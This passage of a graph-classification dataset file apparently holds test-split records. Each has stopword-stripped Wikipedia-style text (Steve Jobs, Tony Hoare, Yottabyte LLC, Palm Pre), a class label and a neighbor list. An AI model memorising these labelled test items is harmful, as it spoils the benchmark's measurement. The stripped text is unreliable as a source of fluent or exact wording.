atari initially refused accept eventually accepted money jobs traveled india mid-1974 visit neem karoli baba kainchi ashram reed friend eventual apple employee daniel kottke search spiritual enlightenment got neem karoli ashram almost deserted neem karoli baba died september 1973 made long trek dry riverbed ashram haidakhan babaji india spent lot time bus rides delhi uttar pradesh himachal pradesh staying seven months jobs left india returned us ahead daniel kottke jobs changed appearance head shaved wore traditional indian clothing time jobs experimented psychedelics later calling lsd experiences one two three important things done life spent period one farm commune oregon owned robert friedland brennan joined period time period jobs brennan became practitioners zen buddhism zen master kōbun chino otogawa jobs living parents backyard toolshed converted bedroom sleeping bag mat books candle meditation pillow jobs engaged lengthy meditation retreats tassajara zen mountain center oldest sōtō zen monastery us considered taking monastic residence eihei-ji japan maintained lifelong appreciation zen jobs would later say people around share countercultural roots could fully relate thinking jobs returned atari assigned create circuit board arcade video game breakout according bushnell atari offered ttl chip eliminated machine jobs little specialized knowledge circuit board design made deal wozniak split fee evenly wozniak could minimize number chips much amazement atari engineers wozniak reduced ttl count 46 design tight impossible reproduce assembly line according wozniak jobs told atari gave 700 instead 5,000 paid wozniak share thus 350 wozniak learn actual bonus ten years later said jobs told explained needed money wozniak would given wozniak designed low-cost digital blue box generate necessary tones manipulate telephone network allowing free long-distance calls jobs decided could make money selling clandestine sales illegal blue boxes went well perhaps planted seed jobs mind electronics could fun profitable jobs 1994 interview recalled took six months wozniak figure build blue boxes jobs said blue boxes would apple states showed could take large companies beat jobs wozniak attended meetings homebrew computer club 1975 stepping stone development marketing first apple computer 1976 wozniak designed developed apple computer showed jobs suggested sell jobs wozniak ronald wayne founded apple computer called apple inc. garage jobs los altos home crist drive wayne stayed short time leaving jobs wozniak active primary cofounders company two decided name apple jobs returned one farm commune oregon told wozniak time spent farm apple orchard neighbor crist drive recalled jobs odd individual would greet clients underwear hanging barefoot hippie-like another neighbor larry waterland earned phd chemical engineering stanford recalled dismissing jobs budding business 'you punched cards put big deck said mainframe machines time 'steve took garage circuit board chip dumont tv set panasonic cassette tape deck keyboard said 'this apple computer said 'you 've got joking dismissed whole idea jobs friend reed college india daniel kottke recalled early apple employee person worked garage ... woz would show week latest code steve jobs n't get hands dirty sense kottke also stated much early work took place jobs kitchen spent hours phone trying find investors company received funding then-semi-retired intel product marketing manager engineer mike markkula scott mcnealy one cofounders sun microsystems said jobs broke glass age ceiling silicon valley 'd created successful company young age markkula brought apple attention arthur rock looking crowded apple booth home brew computer show started 60,000 investment went apple board returned journey india brennan visited jobs parents home still living period jobs brennan fell love brennan noted changes attributes kobun also still following also time jobs displayed prototype apple computer brennan parents living room brennan notes shift time period two main influences jobs apple kobun early 1977 jobs would spend time together home duveneck ranch los altos served hostel environmental education center brennan also worked teacher inner city children came learn farm 1977 jobs wozniak introduced apple ii west coast computer faire first consumer product sold apple computer one first highly successful mass-produced microcomputer products world designed primarily steve wozniak jobs oversaw development apple ii unusual case rod holt developed unique power supply jobs usually went work wearing black long-sleeved mock turtleneck made issey miyake sometimes reported st. croix brand levi 501 blue jeans new balance 991 sneakers said choice inspired stuart geman noted applied mathematics professor brown university jobs told biographer walter isaacson ... came like idea uniform daily convenience rationale claimed ability convey signature style jobs became successful new company relationship brennan grew complex 1977 success apple part relationship brennan daniel kottke jobs moved house near apple office cupertino brennan eventually took position shipping department apple brennan relationship jobs deteriorating position apple grew began consider ending relationship small changes october 1977 brennan approached rod holt asked take paid apprenticeship designing blueprints apples holt jobs believed would good position given artistic abilities holt particularly eager take position puzzled ambivalence toward brennan decision however overshadowed fact realized pregnant jobs father took days tell jobs whose face according brennan turned ugly news time according brennan beginning third trimester jobs said never wanted ask get abortion n't want also refused discuss pregnancy brennan confused estranged mother afraid discuss matter father also feel comfortable idea abortion chose instead discuss matter kobun encouraged keep baby pledged support meanwhile holt waiting decision internship brennan stated jobs continued encourage take internship stating could pregnant work apple take job n't get problem brennan however notes felt ashamed thought growing belly professional environment apple child unpredictable turn punishing sentimentally ridiculous could endured brennan turned internship decided leave apple stated jobs told give baby adoption sorry never going help alone brennan welfare cleaning houses earn money would sometimes ask jobs money always refused brennan hid pregnancy long could living variety homes continuing work zen meditation time according brennan jobs started seed people notion slept around infertile meant could child weeks due give birth brennan invited deliver baby one farm accepted offer jobs 23 age biological parents brennan gave birth baby lisa brennan may 17 1978 jobs went birth contacted robert friedland mutual friend farm owner distant jobs worked name baby discussed sitting fields blanket brennan suggested name lisa jobs also liked notes jobs attached name lisa also publicly denying paternity would discover later time jobs preparing unveil new kind computer wanted give female name first choice claire st. clare also stated never gave permission use baby name computer hid plans jobs also worked team come phrase local integrated software architecture alternative explanation apple lisa decades later however jobs admitted biographer walter isaacson obviously named daughter brennan would come intense criticism jobs claimed n't want money wants according brennan apple mike scott wanted jobs give money apple executives advised ignore fight tried go paternity settlement jobs denied paternity dna test established lisa father required give brennan 385 month addition returning welfare money received jobs gave 500 month time apple went public jobs became millionaire brennan worked waitress palo alto later brennan agreed give interview michael moritz time magazine time person year special released january 3 1983 discussed relationship jobs rather name jobs person year magazine named computer machine year issue jobs questioned reliability paternity test stated probability paternity jobs steven ... 94.1 jobs responded arguing 28 male population united states could father time also noted baby girl machine apple placed much hope future share name lisa jobs worth 1 million 1978 23 years old grew 250 million time 25 according estimates also one youngest people ever make forbes list nation richest people—and one handful done without inherited wealth 1978 apple recruited mike scott national semiconductor serve ceo turned several turbulent years 1983 jobs lured john sculley away pepsi-cola serve apple ceo asking want spend rest life selling sugared water want chance change world 1982 jobs bought apartment two top floors san remo manhattan building politically progressive reputation although never lived spent years renovating help i. m. pei 2003 sold u2 singer bono 1984 jobs bought jackling house estate resided decade leased several years 2000 stopped maintaining house allowing exposure weather degrade 2004 jobs received permission town woodside demolish house order build smaller contemporary styled one years court house finally demolished 2011 months died early 1984 apple introduced macintosh based lisa xerox parc mouse-driven graphical user interface conceived early apple employee jef raskin following year apple aired super bowl television commercial titled 1984 apple annual shareholders meeting january 24 1984 emotional jobs introduced macintosh wildly enthusiastic audience andy hertzfeld described scene pandemonium though marketed received fanfare expensive macintosh hard sell shortly release 1985 bill gates then-developing company microsoft threatened stop developing mac applications unless granted license mac operating system software microsoft developing graphical user interface ... dos calling windows n't want apple sue similarities windows gui mac interface sculley granted microsoft license later led problems apple addition cheap ibm pc clones ran microsoft software graphical user interface began appear although macintosh preceded clones far expensive late 1980s windows user interface getting better better thus taking increasingly share apple windows-based ibm-pc clones also led development additional guis ibm topview digital research gem thus graphical user interface beginning taken granted undermining apparent advantage mac ... seemed clear 1980s wound apple could n't go alone indefinitely whole ibm-clone market sculley jobs respective visions company greatly differed former favored open architecture computers like apple ii sold education small business home markets less vulnerable ibm jobs wanted company focus closed architecture macintosh business alternative ibm pc president ceo sculley little control chairman board jobs macintosh division apple ii division operated like separate companies duplicating services although products provided 85 percent apple sales early 1985 company january 1985 annual meeting mention apple ii division employees many left including wozniak stated company going wrong direction last five years sold stock macintosh failure defeat pc strengthened sculley position company may 1985 sculley—encouraged arthur rock—decided reorganize apple proposed plan board would remove jobs macintosh group put charge new product development move would effectively render jobs powerless within apple response jobs developed plan get rid sculley take apple however jobs confronted plan leaked said would leave apple board declined resignation asked reconsider sculley also told jobs votes needed go ahead reorganization months later september 17 1985 jobs submitted letter resignation apple board five additional senior apple employees also resigned joined jobs new venture next following resignation apple 1985 jobs founded next inc. 7 million year later running money sought venture capital product horizon eventually jobs attracted attention billionaire ross perot invested heavily company next computer shown world considered jobs comeback event lavish invitation gala launch event described multimedia extravaganza celebration held louise m. davies symphony hall san francisco california wednesday october 12 1988 steve wozniak said 2013 interview jobs next really getting head together next workstations first released 1990 priced like apple lisa next workstation technologically advanced designed education sector largely dismissed cost-prohibitive educational institutions next workstation known technical strengths chief among object-oriented software development system jobs marketed next products financial scientific academic community highlighting innovative experimental new technologies mach kernel digital signal processor chip built-in ethernet port making use next computer english computer scientist tim berners-lee invented world wide web 1990 cern switzerland revised second generation nextcube released 1990 jobs touted first interpersonal computer would replace personal computer innovative nextmail multimedia email system nextcube could share voice image graphics video email first time interpersonal computing going revolutionize human communications groupwork jobs told reporters jobs ran next obsession aesthetic perfection evidenced development attention nextcube magnesium case put considerable strain next hardware division 1993 sold 50,000 machines next transitioned fully software development release nextstep/intel company reported first profit 1.03 million 1994 1996 next software inc. released webobjects framework web application development next acquired apple inc. 1997 webobjects used build run apple store mobileme services itunes store 1986 jobs funded spinout graphics group later renamed pixar lucasfilm computer graphics division price 10 million 5 million given company capital 5 million paid lucasfilm technology rights first film produced pixar disney partnership toy story 1995 jobs credited executive producer brought fame critical acclaim studio released next 15 years pixar creative chief john lasseter company produced box-office hits bug life 1998 toy story 2 1999 monsters inc. 2001 finding nemo 2003 incredibles 2004 cars 2006 ratatouille 2007 wall-e 2008 2009 toy story 3 2010 finding nemo incredibles ratatouille wall-e toy story 3 received academy award best animated feature award introduced 2001 2003 2004 pixar contract disney running jobs disney chief executive michael eisner tried failed negotiate new partnership early 2004 jobs announced pixar would seek new partner distribute films contract disney expired october 2005 bob iger replaced eisner disney iger quickly worked mend relations jobs pixar january 24 2006 jobs iger announced disney agreed purchase pixar all-stock transaction worth 7.4 billion deal closed jobs became walt disney company largest single shareholder approximately seven percent company stock jobs holdings disney far exceeded eisner holds 1.7 disney family member roy e. disney 2009 death held 1 company stock whose criticisms eisner—especially soured disney relationship pixar—accelerated eisner ousting upon completion merger jobs received 7 disney shares joined board directors largest individual shareholder upon jobs death shares disney transferred steven p. jobs trust led laurene jobs floyd norman pixar described jobs mature mellow individual never interfered creative process filmmakers early june 2014 pixar cofounder walt disney animation studios president ed catmull revealed jobs advised explain understand disagreements catmull released book creativity inc. 2014 recounts numerous experiences working jobs regarding manner dealing jobs catmull writes chrisann brennan notes jobs forced apple apologized many times behavior towards lisa also states jobs said never took responsibility sorry time jobs developed strong relationship lisa nine jobs name birth certificate changed lisa brennan lisa brennan-jobs addition jobs brennan developed working relationship co-parent lisa change brennan credits influence newly found biological sister mona simpson worked repair relationship lisa jobs jobs found mona first finding birth mother joanne schieble simpson shortly left apple jobs contact birth family adoptive mother clara lifetime however would later tell official biographer walter isaacson never wanted paul clara feel like n't consider parents totally parents ... loved much never wanted know search even reporters keep quiet found however 1986 31 clara diagnosed lung cancer began spend great deal time learned details background adoption information motivated find biological mother jobs found birth certificate name san francisco doctor schieble turned pregnant although doctor help jobs alive left letter jobs opened upon death died soon afterwards jobs given letter stated mother unmarried graduate student wisconsin named joanne schieble jobs contacted schieble clara died received permission father paul addition respect paul asked media report search jobs stated motivated find birth mother curiosity need see okay thank 'm glad n't end abortion twenty-three went lot schieble emotional first meeting though n't familiar history apple jobs role told pressured signing adoption papers said regretted giving repeatedly apologized jobs schieble would develop friendly relationship throughout rest life would spend christmas together first visit schieble told jobs sister mona aware brother schieble arranged meet new york mona worked first impression jobs totally straightforward lovely normal sweet guy simpson jobs went long walk get know jobs later told biographer mona completely thrilled first life mother emotionally affectionate toward got know became really good friends family n't know 'd without ca n't imagine better sister adopted sister patty never close jobs learned family history six months given adoption schieble father died wed jandali daughter mona jandali states finishing phd returned syria work period schieble left divorced 1962 also states divorce lost contact mona period time also bear responsibility away daughter four years old mother divorced went syria got back touch 10 years lost touch mother moved n't know since 10 years ago 've constant contact see three times year organized trip last year visit syria lebanon went relative florida years later schieble married ice skating teacher george simpson mona jandali took stepfather last name thus became mona simpson 1970 divorced schieble took mona los angeles raised jobs told official biographer meeting simpson wanted become involved ongoing search father found working sacramento decided simpson would meet jandali simpson spoke several hours point told left teaching restaurant business also said schieble given another child away adoption 'll never see baby baby gone simpson mention met jobs jandali told simpson managed mediterranean restaurant near san jose successful technology people used come even steve jobs ... oh yeah used come sweet guy big tipper hearing visit jobs recalled amazing ... restaurant times remember meeting owner syrian balding shook hands however jobs want meet jandali wealthy man n't trust try blackmail go press ... asked mona tell jandali later discovered relationship jobs online blog contacted simpson asked thing steve jobs simpson told true later commented father thoughtful beautiful storyteller passive ... never contacted steve simpson researched syrian roots began meet members family assumed jobs would eventually want meet father never jobs also never showed interest syrian heritage middle east simpson fictionalized search father 1992 novel lost father malek jandali cousin 1989 jobs first met future wife laurene powell gave lecture stanford graduate school business student soon event stated laurene right front row lecture hall could n't take eyes ... kept losing train thought started feeling little giddy lecture jobs met parking lot invited dinner point forward together minor exceptions rest life powell father died young mother raised middle class new jersey home similar one jobs grew received ba university pennsylvania spent short period high finance found n't interest decided pursue mba stanford instead addition unlike jobs athletic followed professional sports also brought much self-sufficiency relationship private public person jobs proposed new year day 1990 fistful freshly picked wildflowers married march 18 1991 buddhist ceremony ahwahnee hotel yosemite national park fifty people including father paul sister mona attended ceremony conducted jobs guru kobun chino otogawa vegan wedding cake shape yosemite half dome wedding ended hike laurene brothers snowball fight jobs reported said mona see mona ... laurene descended joe namath 're descended john muir jobs powell first child reed born september 1991 jobs father paul died year half later march 5 1993 jobs powell two children erin born august 1995 eve born 1998 family lived palo alto california journalist grew locally remembered owning house scariest halloween decorations palo alto ... n't remember seeing busy terrified 1996 apple announced would buy next 427 million deal finalized february 1997 bringing jobs back company cofounded jobs became de facto chief then-ceo gil amelio ousted july 1997 formally named interim chief executive september march 1998 concentrate apple efforts returning profitability jobs terminated number projects newton cyberdog opendoc coming months many employees developed fear encountering jobs riding elevator afraid might job doors opened reality jobs summary executions rare handful victims enough terrorize whole company jobs changed licensing program macintosh clones making costly manufacturers continue making machines purchase next much company technology found way apple products notably nextstep evolved mac os x jobs guidance company increased sales significantly introduction imac new products since appealing designs powerful branding worked well apple 2000 macworld expo jobs officially dropped interim modifier title apple became permanent ceo jobs quipped time would using title iceo company subsequently branched introducing improving upon digital appliances introduction ipod portable music player itunes digital music software itunes store company made forays consumer electronics music distribution june 29 2007 apple entered cellular phone business introduction iphone multi-touch display cell phone also included features ipod mobile browser revolutionized mobile browsing scene nurturing open-ended innovation jobs also reminded employees real artists ship jobs public war words dell computer ceo michael dell starting 1987 jobs first criticized dell making un-innovative beige boxes october 6 1997 gartner symposium dell asked would ran then-troubled apple computer company said 'd shut give money back shareholders 2006 jobs sent email employees apple market capitalization rose dell jobs admired criticized consummate skill persuasion salesmanship dubbed reality distortion field particularly evident keynote speeches colloquially known stevenotes macworld expos apple worldwide developers conferences jobs board member gap inc. 1999 2002 2001 jobs granted stock options amount 7.5 million shares apple exercise price 18.30 alleged options backdated exercise price 21.10 alleged jobs thereby incurred taxable income 20,000,000 report apple overstated earnings amount result jobs potentially faced number criminal charges civil penalties case subject active criminal civil government investigations though independent internal apple investigation completed december 29 2006 found jobs unaware issues options granted returned without exercised 2003 2005 jobs responded criticism apple poor recycling programs e-waste us lashing environmental advocates apple annual meeting cupertino april weeks later apple announced would take back ipods free retail stores computer takeback campaign responded flying banner plane stanford university graduation jobs commencement speaker banner read steve n't mini-player—recycle e-waste 2006 expanded apple recycling programs us customer buys new mac program includes shipping environmentally friendly disposal old systems success apple unique products services provided several years stable financial returns propelling apple become world valuable publicly traded company 2011 jobs perceived demanding perfectionist always aspired position businesses products forefront information technology industry foreseeing setting innovation style trends summed self-concept end keynote speech macworld conference expo january 2007 quoting ice hockey player wayne gretzky july 1 2008 billion class action suit filed several members apple board directors revenue lost alleged securities fraud 2011 interview biographer walter isaacson jobs revealed met us president barack obama complained nation shortage software engineers told obama headed one-term presidency jobs proposed foreign student got engineering degree us university automatically offered green card meeting jobs commented president smart kept explaining us reasons things ca n't get done infuriates october 2003 jobs diagnosed cancer mid-2004 announced employees cancerous tumor pancreas prognosis pancreatic cancer usually poor jobs stated rare much less aggressive type known islet cell neuroendocrine tumor despite diagnosis jobs resisted doctors recommendations medical intervention nine months instead relying alternative medicine thwart disease according harvard researcher ramzi amri choice alternative treatment led unnecessarily early death doctors agree jobs diet insufficient address disease however cancer researcher alternative medicine critic david gorski wrote impossible know whether much might decreased chances surviving cancer flirtation woo best guess jobs probably modestly decreased chances survival barrie r. cassileth chief memorial sloan kettering cancer center integrative medicine department said jobs faith alternative medicine likely cost life ... kind pancreatic cancer treatable curable ... essentially committed suicide according jobs biographer walter isaacson nine months refused undergo surgery pancreatic cancer – decision later regretted health declined instead tried vegan diet acupuncture herbal remedies treatments found online even consulted psychic also influenced doctor ran clinic advised juice fasts bowel cleansings unproven approaches finally surgery july 2004 eventually underwent pancreaticoduodenectomy whipple procedure july 2004 appeared remove tumor successfully jobs receive chemotherapy radiation therapy jobs absence tim cook head worldwide sales operations apple ran company early august 2006 jobs delivered keynote apple annual worldwide developers conference thin almost gaunt appearance unusually listless delivery together choice delegate significant portions keynote presenters inspired flurry media internet speculation state health contrast according ars technica journal report worldwide developers conference wwdc attendees saw jobs person said looked fine following keynote apple spokesperson said steve health robust two years later similar concerns followed jobs 2008 wwdc keynote address apple officials stated jobs victim common bug taking antibiotics others surmised cachectic appearance due whipple procedure july conference call discussing apple earnings participants responded repeated questions jobs health insisting private matter others said shareholders right know given jobs hands-on approach running company based off-the-record phone conversation jobs new york times reported health problems amounted good deal common bug n't life-threatening n't recurrence cancer august 28 2008 bloomberg mistakenly published 2500-word obituary jobs corporate news service containing blank spaces age cause death news carriers customarily stockpile up-to-date obituaries facilitate news delivery event well-known figure death although error promptly rectified many news carriers blogs reported intensifying rumors concerning jobs health jobs responded apple september 2008 let rock keynote paraphrasing mark twain reports death greatly exaggerated subsequent media event jobs concluded presentation slide reading 110/70 referring blood pressure stating would address questions health december 16 2008 apple announced marketing vice-president phil schiller would deliver company final keynote address macworld conference expo 2009 reviving questions jobs health statement given january 5 2009 apple.com jobs said suffering hormone imbalance several months january 14 2009 jobs wrote internal apple memo previous week learned health-related issues complex originally thought announced six-month leave absence end june 2009 allow better focus health tim cook previously acted ceo jobs 2004 absence became acting ceo apple jobs still involved major strategic decisions 2009 tim cook offered portion liver jobs since share rare blood type donor liver regenerate tissue operation jobs yelled 'll never let 'll never april 2009 jobs underwent liver transplant methodist university hospital transplant institute memphis tennessee jobs prognosis described excellent january 17 2011 year half jobs returned work following liver transplant apple announced granted medical leave absence jobs announced leave letter employees stating decision made could focus health time 2009 medical leave apple announced tim cook would run day-to-day operations jobs would continue involved major strategic decisions company leave jobs appeared ipad 2 launch event march 2 wwdc keynote introducing icloud june 6 cupertino city council june 7 august 24 2011 jobs announced resignation apple ceo writing board always said ever came day could longer meet duties expectations apple ceo would first let know unfortunately day come jobs became chairman board named tim cook successor ceo jobs continued work apple day death six weeks later jobs died palo alto california home around 3 p.m. pdt october 5 2011 due complications relapse previously treated islet-cell pancreatic neuroendocrine tumor resulted respiratory arrest lost consciousness day died wife children sisters side sister mona simpson described death thus steve final words hours earlier monosyllables repeated three times embarking 'd looked sister patty long time children life partner laurene shoulders past steve final words 'oh wow oh wow oh wow lost consciousness died several hours later small private funeral held october 7 2011 details respect jobs family made public apple pixar issued announcements death apple announced day plans public service encouraging well-wishers send remembrance messages email address created receive messages apple microsoft flew flags half-staff throughout respective headquarters campuses bob iger ordered disney properties including walt disney world disneyland fly flags half-staff october 6 12 2011 two weeks following death apple displayed corporate web site simple page showed jobs name lifespan next grayscale portrait october 19 2011 apple employees held private memorial service jobs apple campus cupertino jobs widow laurene attendance well cook bill campbell norah jones al gore coldplay apple retail stores closed briefly employees could attend memorial video service uploaded apple website california governor jerry brown declared sunday october 16 2011 steve jobs day day invitation-only memorial held stanford university attendance included apple tech company executives members media celebrities close friends jobs politicians along jobs family bono yo yo joan baez performed service lasted longer hour service highly secured guards university gates helicopter flying overhead area news station attendee given small brown box farewell gift jobs box contained copy autobiography yogi paramahansa yogananda apple co-founder steve wozniak former owner would become pixar george lucas ref name= http //postcards.blogs.fortune.cnn.com/2011/10/06/george-lucas-steve-jobs/ /ref former rival microsoft co-founder bill gates president barack obama offered statements response death jobs buried unmarked grave alta mesa memorial park nonsectarian cemetery palo alto steve jobs subject number books films lisa brennan-jobs jobs eldest daughter described jobs memoir sexually inappropriate described patterns cruel behavior adolescent years jobs design aesthetic influenced philosophies zen buddhism india experienced buddhism seven-month spiritual journey sense intuition influenced spiritual people studied also learned many references sources modernist architectural style joseph eichler industrial designs richard sapper dieter rams according apple cofounder steve wozniak steve n't ever code n't engineer n't original design ... daniel kottke one apple earliest employees college friend jobs stated woz jobs woz innovator inventor steve jobs marketing person listed either primary inventor co-inventor 346 united states patents patent applications related range technologies actual computer portable devices user interfaces including touch-based speakers keyboards power adapters staircases clasps sleeves lanyards packages jobs contributions patents look feel product industrial design chief jonathan ive name along 200 patents design patents specific product designs example jobs listed primary inventor patents original lamp-style imacs well powerbook g4 titanium opposed utility patents inventions 43 issued us patents inventions patent mac os x dock user interface magnification feature issued day died although jobs little involvement engineering technical side original apple computers jobs later used ceo position directly involve product design involved many projects throughout career long-time marketing executive confidant joanna hoffman known one employees apple next could successfully stand jobs also engaging even terminally ill hospital jobs sketched new devices would hold ipad hospital bed also despised oxygen monitor finger suggested ways revise design simplicity since death former apple ceo 141 patents inventors win lifetimes currently jobs holds 450 patents apple ii 8-bit home computer one world first highly successful mass-produced microcomputer products designed primarily steve wozniak jobs oversaw development apple ii unusual case rod holt developed unique power supply introduced 1977 west coast computer faire jobs wozniak first consumer product sold apple computer lisa personal computer designed apple early 1980s first personal computer offer graphical user interface machine aimed individual business users development lisa began 1978 lisa sold poorly 100,000 units sold 1982 jobs forced lisa project joined macintosh project macintosh direct descendant lisa although obvious similarities systems final revision lisa 2/10 modified sold macintosh xl joined original macintosh team jobs took project wozniak experienced traumatic airplane accident temporarily left company jobs introduced macintosh computer january 24 1984 first mass-market personal computer featuring integral graphical user interface mouse first model later renamed macintosh 128k uniqueness amongst populous family subsequently updated models also based apple proprietary architecture since 1998 apple largely phased macintosh name favor mac though product family nicknamed mac mac since development first model macintosh introduced us 1.5 million ridley scott television commercial 1984 notably aired third quarter super bowl xviii january 22 1984 people consider ad watershed event masterpiece regis mckenna called ad successful mac 1984 uses unnamed heroine represent coming macintosh indicated picasso-style picture computer white tank top means saving humanity conformity ibm attempts dominate computer industry ad alludes george orwell novel nineteen eighty-four describes dystopian future ruled televised big brother macintosh however expensive hindered ability competitive market already dominated commodore 64 consumers well ibm personal computer accompanying clone market businesses macintosh systems still found success education desktop publishing kept apple second-largest pc manufacturer next decade jobs forced apple 1985 started company built workstation computers next computer introduced 1988 lavish launch event tim berners-lee created world first web browser worldwideweb using next computer next computer operating system named nextstep basis darwin kernel operating system apple products namely macos ios watchos audioos apple imac introduced 1998 innovative design directly result jobs return apple apple boasted back computer looks better front anyone else described cartoonlike first imac clad bondi blue plastic unlike personal computer came 1999 apple introduced graphite gray apple imac since varied shape colour size considerably maintaining all-in-one design design ideas intended create connection user handle breathing light effect computer went sleep apple imac sold 1,299 time imac also featured forward-thinking changes eschewing floppy disk drive moving exclusively usb connecting peripherals latter change resulted imac success interface popularised among third-party peripheral makers—as evidenced fact many early usb peripherals made translucent plastic match imac design itunes media player media library online radio broadcaster mobile device management application developed apple used play download organize digital audio video well types media available itunes store personal computers running macos microsoft windows operating systems itunes store also available ipod touch iphone ipad itunes store users purchase download music music videos television shows audiobooks podcasts movies movie rentals countries ringtones available iphone ipod touch fourth generation onward application software iphone ipad ipod touch downloaded app store first generation ipod released october 23 2001 major innovation ipod small size achieved using 1.8 hard drive compared 2.5 drives common players time capacity first generation ipod ranged 5 gb 10 gb ipod sold us 399 100,000 ipods sold end 2001 introduction ipod resulted apple becoming major player music industry also ipod success prepared way itunes music store iphone 1st generation ipod apple released hard drive-based ipod classic touchscreen ipod touch video-capable ipod nano screenless ipod shuffle following years apple began work first iphone 2005 first iphone released june 29 2007 iphone created sensation survey indicated six ten americans aware release time declared invention year 2007 completed iphone multimedia capabilities functioned quad-band touch screen smartphone year later iphone 3g released july 2008 three key features support gps 3g data tri-band umts/hsdpa june 2009 iphone 3gs whose improvements included voice control better camera faster processor introduced phil schiller iphone 4 thinner previous models five megapixel camera capable recording video 720p hd adds secondary front-facing camera video calls major feature iphone 4s introduced october 2011 siri virtual assistant capable voice recognition ipad ios-based line tablet computers designed marketed apple first ipad released april 3 2010 recent ipad models ipad 2017 ipad pro ipad mini 4 released september 9 2015 march 24 2017 user interface built around device multi-touch screen including virtual keyboard ipad includes built-in wi-fi cellular connectivity select models 250 million ipads sold",
    "neighbors": [
      10755,
      9732,
      1542,
      1549,
      7697,
      4114,
      11289,
      1576,
      6186,
      6700,
      5681,
      1074,
      9778,
      9784,
      10808,
      4669,
      8253,
      576,
      5696,
      5699,
      8774,
      8783,
      4180,
      10838,
      6234,
      3167,
      9826,
      1123,
      5733,
      8806,
      3691,
      8303,
      2676,
      119,
      6264,
      2686,
      6783,
      7806,
      10878,
      1666,
      4741,
      8842,
      7307,
      6797,
      143,
      10386,
      5784,
      1177,
      4251,
      11420,
      2207,
      3749,
      10406,
      11430,
      171,
      2735,
      3248,
      4283,
      7869,
      5830,
      712,
      713,
      3790,
      7378,
      3286,
      9430,
      3293,
      4318,
      231,
      2282,
      1772,
      4844,
      10481,
      242,
      5363,
      7928,
      8441,
      11513,
      2819,
      5384,
      1290,
      9999,
      784,
      6419,
      4888,
      9499,
      10023,
      3371,
      4399,
      7983,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      7496,
      3409,
      2388,
      11605,
      8540,
      350,
      6495,
      9063,
      2921,
      10602,
      3948,
      1389,
      11118,
      11629,
      10608,
      5492,
      7541,
      9084,
      6023,
      6539,
      1428,
      6554,
      3483,
      2979,
      9123,
      11173,
      8109,
      8628,
      2492,
      446,
      7614,
      9665,
      10691,
      2502,
      456,
      1482,
      3533,
      464,
      6608,
      8662,
      9174,
      7640,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      6129,
      7154,
      5619,
      11257,
      6654,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 2283,
    "label": 9,
    "text": "Tony_Hoare:tony hoare sir charles antony richard hoare born 11 january 1934 british computer scientist developed sorting algorithm quicksort 1959/1960 also developed hoare logic verifying program correctness formal language communicating sequential processes csp specify interactions concurrent processes including dining philosophers problem inspiration occam programming language born colombo ceylon sri lanka british parents tony hoare father colonial civil servant mother daughter tea planter hoare educated england dragon school oxford king school canterbury studied classics philosophy greats merton college oxford graduating 1956 18 months national service royal navy learned russian returned university oxford 1958 study postgraduate certificate statistics began computer programming taught autocode ferranti mercury leslie fox went moscow state university british council exchange student studied machine translation andrey kolmogorov 1960 hoare left soviet union began working elliott brothers ltd small computer manufacturing firm located london implemented algol 60 began developing major algorithms became professor computing science queen university belfast 1968 1977 returned oxford professor computing lead programming research group oxford university computing laboratory department computer science university oxford following death christopher strachey emeritus professor also principal researcher microsoft research cambridge england hoare significant work following areas sorting selection algorithm quicksort quickselect hoare logic formal language communicating sequential processes csp used specify interactions concurrent processes structuring computer operating systems using monitor concept axiomatic specification programming languages speaking software conference called qcon london 2009 apologised inventing null reference many years leadership oxford department worked formal specification languages csp z achieve expected take-up industry 1995 hoare led reflect upon original assumptions 1962 hoare married jill pym member research team",
    "neighbors": [
      512,
      9345,
      4483,
      9351,
      7048,
      9224,
      4107,
      11020,
      1947,
      1435,
      1702,
      428,
      10668,
      7983,
      2482,
      8499,
      6454,
      1976,
      4412,
      6652,
      4799,
      4800,
      10049,
      4930,
      7671,
      11457,
      70,
      8262,
      10568,
      3529,
      1610,
      1611,
      7164,
      8524,
      10061,
      11339,
      5456,
      5585,
      5714,
      1883,
      2012,
      7775,
      9315,
      10469,
      10471,
      4201,
      11242,
      2798,
      9710,
      11253,
      1783,
      10617,
      3196,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 2284,
    "label": 7,
    "text": "Yottabyte_LLC:yottabyte llc yottabyte llc software-defined data center sddc company founded 2010 headquartered bloomfield township oakland county michigan yottabyte also operates three physical data centers throughout united states yottabyte software enables companies build virtual data centers industry standard server storage networking gear software yottabyte founded 2010 founders include greg campbell vice president technology paul e. hodges iii president ceo duane tursi yottabyte concept originated campbell hodges sitting conference room tossing around ideas campbell cto developed yottabyte software architecture yottabyte llc named cool vendor compute platform gartner 2016 runner virtualization trailblazers 2015 tech trailblazers september 2016 yottabyte partnered university michigan accelerate data-intensive research project known yottabyte research cloud gives scientists access high-performance secure flexible computing environments enables analysis sensitive data sets restricted federal privacy laws proprietary access agreements confidentiality requirements may 2017 yottabyte brought michael j. aloe board senior vice president sales operations aloe announced chief operations officer coo may 2018",
    "neighbors": [
      1801,
      8446,
      6703
    ],
    "mask": "Test"
  },
  {
    "node_id": 2285,
    "label": 2,
    "text": "Palm_Pre:palm pre palm pre styled palm prē multitasking smartphone designed marketed palm multi-touch screen sliding keyboard smartphone first use palm linux based mobile operating system webos pre functions camera phone portable media player location navigation capabilities pre also serves personal information manager number communication collaboration applications bluetooth wi-fi connectivity built-in pre launched united states america june 6 2009 sprint later canada bell mobility gsm version original pre launched later 2009 number networks europe mexico revised model palm pre plus doubled available memory internal storage launched january 25 2010 verizon wireless later released mobility may 16 2010 third generation palm pre palm pre 2 uses hp webos 2.0 announced october 2010 palm pre became fastest selling phone sprint history widely praised device palm debuted pre 2009 consumer electronics show first mobile phone use texas instruments omap 3430 processor well initial us exclusive carrier agreement sprint operates cdma network prior device launch known internally codename castle white castle 'slider hamburgers since palm first slider phone apple accused pre copying elements user interface apple coo tim cook stating stand people ripping ip palm responding tools necessary defend hinting palm large portfolio patents may 19 2009 sprint palm announced pre would available beginning june 6 2009 united states may 28 2009 verizon wireless announced would also carry palm pre six months later comment sprint spokesperson indicated launch carrier would us exclusivity rights pre 2009 sprint ceo dan hesse commented company palm agreed discuss length exclusivity deal remarked six months july 7 2009 telefónica announced would exclusively carry palm pre uk spain ireland germany o2 movistar networks availability winter holidays palm pre available longer available uk july 27 2009 company second quarter conference call verizon chief operating officer denny strigl announced verizon wireless would begin selling palm pre early 2010 news coverage launch noted sales quantity record 